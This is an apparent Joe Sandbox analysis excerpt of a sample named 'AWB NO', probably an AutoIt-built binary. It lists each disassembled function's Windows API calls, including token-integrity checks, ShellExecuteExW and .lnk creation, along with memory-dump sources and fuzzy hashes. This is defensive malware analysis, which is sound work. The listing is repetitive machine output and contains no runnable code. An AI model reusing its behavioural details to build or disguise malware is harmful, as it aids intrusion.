                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048B44C
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B471
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B489
                                                              • GetSystemMetrics.USER32(00000004), ref: 0048B4B2
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00471184,00000000), ref: 0048B4D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: 3791213dd528cec4b325057b62e4416410566fbdb7feea0c1a07f810ca373461
                                                              • Instruction ID: 4d453164610f07825c255fc9dd53b5462fd2bb911a73659e8130ccaca7f2bf79
                                                              • Opcode Fuzzy Hash: 3791213dd528cec4b325057b62e4416410566fbdb7feea0c1a07f810ca373461
                                                              • Instruction Fuzzy Hash: B1219131510215AFCB10AF388C05A6E3BA4FB05B24F158F3AF926D22E2E7349811DB98
                                                              Function 00422EC8 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,00000000,00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422EDB
                                                              • DecodePointer.KERNEL32(?,?,00422EA5,0043B80A,004BBB50), ref: 00422EE6
                                                              • EncodePointer.KERNEL32(00000000,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F4D
                                                              • EncodePointer.KERNEL32(0043B80A,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F5B
                                                              • EncodePointer.KERNEL32(00000004,?,?,00422EA5,0043B80A,004BBB50), ref: 00422F67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pointer$Encode$Decode
                                                              • String ID:
                                                              • API String ID: 1898114064-0
                                                              • Opcode ID: 6cba4af9be9bd637e00d4dc24e1ed588dc77bab247c401d428b928d73a6e6ed4
                                                              • Instruction ID: 2bba0eaa511302fafcc1f6b65b825d62949ed2e19aaa1556a5c5e55d1e537fcd
                                                              • Opcode Fuzzy Hash: 6cba4af9be9bd637e00d4dc24e1ed588dc77bab247c401d428b928d73a6e6ed4
                                                              • Instruction Fuzzy Hash: 5F117272710225AF9B10DB34EF848AABBF9EB05350791457BE805D3210EB75EC049B98
                                                              Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                              • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                              • BeginPath.GDI32(?), ref: 00401373
                                                              • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
                                                              • Instruction ID: 01809ca1199762821c7ccc43aba1927c018ed3358b57c1522327ad2857708082
                                                              • Opcode Fuzzy Hash: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
                                                              • Instruction Fuzzy Hash: 9B213070801304EFEB11AF65DC04B6A7BB8FB00321F55863BF810A62F0D7799995DBA9
                                                              Function 0045874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                              • GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                              • HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                              • Instruction ID: 6cc8d7d5e4e0d4770d63651d33da719a3d54cfafac7baedd574211c687e01efd
                                                              • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                              • Instruction Fuzzy Hash: 0C014B75200604EFDB204FA6DC88D6B7BADFF89756720097EFC49D2260DA318C18CB64
                                                              Function 004654E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465502
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465510
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465518
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465522
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
                                                              • Instruction ID: 904bb0919bfdc2718e962a82bb6b112c9c46cd464800c0dd09bb372580e459e7
                                                              • Opcode Fuzzy Hash: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
                                                              • Instruction Fuzzy Hash: 1A016131D00A19EBCF00DFE8E84D6EDBB78FB09711F04046AE502F2154EB345954C7AA
                                                              Function 00457652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045766F
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 0045768A
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 00457698
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?), ref: 004576A8
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 004576B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                              • Instruction ID: 2835faaf4413c363fa1ba4ee9e64f4df3655ad9e5f4e5c2265302ab3b3ce24e2
                                                              • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                              • Instruction Fuzzy Hash: 29018472601614BBDB105F58EC44BAE7BADEB44762F140439FD08D2212E735DD4997A4
                                                              Function 004585F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00458608
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00458612
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00458621
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00458628
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0045863E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                              • Instruction ID: b254a1de749970eb350751d9d46ef18a572f1fe096513f8760851dcb275af81e
                                                              • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                              • Instruction Fuzzy Hash: 0DF03C31201204AFEB100FA5DCCDE6F3BACEF8A755B10083EF94596261DF659C49DB64
                                                              Function 00458652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458669
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00458673
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458682
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458689
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045869F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                              • Instruction ID: 619a58c91ecffcacb0c4c72c0e529b68c3fe02445c7328d4e1caf024910930dc
                                                              • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                              • Instruction Fuzzy Hash: 0BF0AF70200304EFEB111FA4EC88E6B3BACEF8A755B14043EF905D2251DF649C18DB64
                                                              Function 0045C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C6BA
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C6D1
                                                              • MessageBeep.USER32(00000000), ref: 0045C6E9
                                                              • KillTimer.USER32(?,0000040A), ref: 0045C705
                                                              • EndDialog.USER32(?,00000001), ref: 0045C71F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: ef350aab00c4addea5b29d025b6c6e34dc14d5866bb1b6e489a2aa35f3095eed
                                                              • Instruction ID: 3003470e8657fa6b09e994d0b3a149c3862edb7236d9b7275a5f5f596171c00c
                                                              • Opcode Fuzzy Hash: ef350aab00c4addea5b29d025b6c6e34dc14d5866bb1b6e489a2aa35f3095eed
                                                              • Instruction Fuzzy Hash: F40144305007049BEB215B60DD8EB9A7778BF04706F00066EF942B15E1EBE4695D8F59
                                                              Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 004013BF
                                                              • StrokeAndFillPath.GDI32(?,?,0043BAD8,00000000,?), ref: 004013DB
                                                              • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                              • DeleteObject.GDI32 ref: 00401401
                                                              • StrokePath.GDI32(?), ref: 0040141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
                                                              • Instruction ID: f812cb0b4e4429ed7f7e618ed03f07a0aa621b4c15f073e4694ef7f498b4602e
                                                              • Opcode Fuzzy Hash: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
                                                              • Instruction Fuzzy Hash: 67F01930001208EFDB516F26EC4CB593BA4AB41326F15C639E829941F1C7358999DF28
                                                              Function 0046BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                              • CoInitialize.OLE32(00000000), ref: 0046BC26
                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046BC3F
                                                              • CoUninitialize.OLE32 ref: 0046BC5C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 3769357847-24824748
                                                              • Opcode ID: 7548b8fafddf0d7f6773bac1ae2287a31057f9780c652219ca288d79e74e43db
                                                              • Instruction ID: 038a0dac91eadc7f8d151fd3961caeb3378ad9cb536dade050a2aa4d4a1657ab
                                                              • Opcode Fuzzy Hash: 7548b8fafddf0d7f6773bac1ae2287a31057f9780c652219ca288d79e74e43db
                                                              • Instruction Fuzzy Hash: 1EA153716042019FCB00DF15C484E5ABBE5FF88318F14899EF899AB3A2DB35ED45CB96
                                                              Function 0045B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0045B981
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container$%I
                                                              • API String ID: 3565006973-4251005282
                                                              • Opcode ID: 607f608411403fc930b1075844590e2650f926b10a7cd48bb0136dbe69c9fc77
                                                              • Instruction ID: fb3361167640a3393b05a66091946d0b3b2d9ad6d528c81b3883d5ecba530668
                                                              • Opcode Fuzzy Hash: 607f608411403fc930b1075844590e2650f926b10a7cd48bb0136dbe69c9fc77
                                                              • Instruction Fuzzy Hash: 66914B70600601AFDB24DF24C885B6ABBE8FF48711F24856EED49CB392DB74E845CB94
                                                              Function 00457A78 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C32
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C4A
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask
                                                              • String ID: ,,I
                                                              • API String ID: 3873279438-4163367948
                                                              • Opcode ID: 9e9d54a612d361c4c0fd3678b63fb4255e2557ef87f74978d089d1f5f4d79180
                                                              • Instruction ID: f139bf706871657843ff4518930df34df8ed479ad379568e6a589584bca42520
                                                              • Opcode Fuzzy Hash: 9e9d54a612d361c4c0fd3678b63fb4255e2557ef87f74978d089d1f5f4d79180
                                                              • Instruction Fuzzy Hash: 6A814F71A00109EFCB00DF94C984EEEB7B9FF89315F2041A9F905AB251DB75AE09CB64
                                                              Function 00462F86 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 195windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004630A6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00463159
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00463187
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default
                                                              • String ID: 0
                                                              • API String ID: 1306138088-4108050209
                                                              • Opcode ID: c96f9feed46ea861348ea2dc2c74f181596584a91f4e2de55b3b64d3aa70fc60
                                                              • Instruction ID: 5f8f8906756aa80e7caec182ea647f193b7f32e8aa59a0add1d918dcf171f5cd
                                                              • Opcode Fuzzy Hash: c96f9feed46ea861348ea2dc2c74f181596584a91f4e2de55b3b64d3aa70fc60
                                                              • Instruction Fuzzy Hash: FA51E2316083809AD715DF28D845AABB7E8EF56315F04492FF885D32D1EB78CE48879B
                                                              Function 0047F732 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 0047F86A
                                                              • GetProcessId.KERNEL32(00000000), ref: 0047F8E1
                                                              • CloseHandle.KERNEL32(00000000), ref: 0047F910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseExecuteHandleProcessShell
                                                              • String ID: @
                                                              • API String ID: 1279613386-2766056989
                                                              • Opcode ID: b683b677b22f8557cca32ef78dc32d05fe1a310482d54b8faeb7ec1ad6365912
                                                              • Instruction ID: 1ebb2d383b77566c64692166f8b5d4dc5c82307fe06e73241e304cbf50fef34f
                                                              • Opcode Fuzzy Hash: b683b677b22f8557cca32ef78dc32d05fe1a310482d54b8faeb7ec1ad6365912
                                                              • Instruction Fuzzy Hash: 0061A0B4A00619DFCB14EF55C5809AEBBB4FF48314B15846EE849BB391CB38AD44CF98
                                                              Function 0042023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
